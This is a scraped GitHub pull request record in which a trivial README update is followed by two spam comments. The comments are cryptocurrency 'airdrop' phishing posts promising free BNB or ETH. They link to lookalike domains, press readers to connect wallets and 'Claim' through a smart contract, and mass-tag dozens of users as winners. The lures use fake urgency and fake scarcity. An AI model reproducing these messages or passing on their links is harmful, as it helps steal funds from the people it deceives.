### PR TITLE
Update README.md

### PR DESCRIPTION
**Pull request by konrad-jamrozik**
Testing new workflow for:
- https://github.com/Azure/azure-rest-api-specs/pull/25942

### CODE REVIEW

**Comment by chasedson** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[Claim Now](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @simonw, @gwthompson, @ham2qur, @SuYuuuuuu, @MuhammedResulBilkil, @WantGo, @mabry1985

**Comment by moonsuyoung** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
dulacp, @lod61, @jaekwon, @tillcash, @brd3v, @jackinf, @badguy233, @snowmanunderwater, @STillSB, @Rishabh04-02, @orange030, @Mabbs, @duqb, @EpicGamer007, @mehdimiri1102, @KartikeyaShukla, @lazyzyf, @pleasereachmeoutonmoeinxyz, @loudinthecloud, @kennyledet, @iFlyWu, @awilisch, @nazhenhuiyi, @iMobs, @scottbontrager, @igsys, @WQHelloWorld, @gillesfabio, @jeuskirchen, @goglor, @lexlong2007, @lparam, @SauravKanchan, @joshuarosato, @lscieux, @taz7s, @IMRUMI, @huopd, @raphrel, @jojobyte, @bingwen, @myasincavdar, @Realmyname, @Lovesakura, @lukacat10, @KusTa, @tioover, @zacharycp, @imtiercel, @JasonWei512

**Pull request closed without merging**
